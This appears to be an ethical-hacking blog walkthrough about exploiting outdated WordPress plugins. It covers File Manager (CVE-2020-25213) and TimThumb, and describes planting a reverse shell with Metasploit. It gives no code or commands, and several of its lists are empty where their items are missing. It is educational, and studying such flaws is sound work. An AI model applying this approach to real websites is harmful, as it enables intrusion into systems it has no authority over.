wordpress
ethical-hacking
reverse-shell
metasploit
revslider
vulnerable plugins
Sometimes, websites seem harmless. A beer blog, a visual gallery, a friendly portal. But if you pause for a second… and look behind the facade… you’ll see an opportunity.
Today we’ll learn how poorly managed plugins can become serious attack vectors.
WordPress allows you to extend its functionality through small modules called plugins. These let you:
The problem is that many of these plugins are created by third parties and if not updated regularly, they may contain publicly known vulnerabilities.
File Manager was a legitimate WordPress plugin designed to provide a web interface for server file management. With over 700,000 active installations, it became an essential tool for many admins who preferred to manage files directly from the WordPress dashboard.
In September 2020, security researchers discovered a critical vulnerability in File Manager version 6.0 and earlier. The issue was in a specific plugin file that:
This vulnerability was assigned CVE-2020-25213 and a CVSS score of 10.0, the highest possible. The response was immediate but complex:
TimThumb was a PHP library widely adopted by the WordPress community for dynamic image resizing. Its popularity was due to its simplicity: developers could easily integrate it into their themes to generate thumbnails automatically without pre-processing images.
The timthumb.php
script worked by receiving parameters via GET, where you specified the image source and desired dimensions. This seemingly innocent functionality hid a serious security issue in its early versions.
The critical flaw was the lack of proper input validation. TimThumb accepted remote URLs as image sources and downloaded them to the server for processing. However, it did not properly check:
This combination allowed an attacker to make the server download and store malicious PHP files, which could then be executed directly through the browser.
The TimThumb vulnerability was devastating because:
Think of it this way:
The idea is to plant a reverse shell that connects from the victim to the attacker, and once inside… explore.
Metasploit is one of the most powerful frameworks for exploiting known vulnerabilities.
It allows you to:
This exercise is a classic example of using Metasploit in its most direct form.
Metasploit isn’t magic. It’s precision, and if you know how to speak to it, it opens doors.
The site seems to be celebrating. But maybe it celebrates too much. The attack isn’t in what’s visible. It’s in what’s unprotected, in what’s already patched… but not here.
Plugins are doors. Your job is to find the ones left open.
Where many see an old site with banners and sliders… you should see vectors, versions, and backdoors. Because in offensive cybersecurity, the enemy is negligence and your advantage is observation.
Cheers!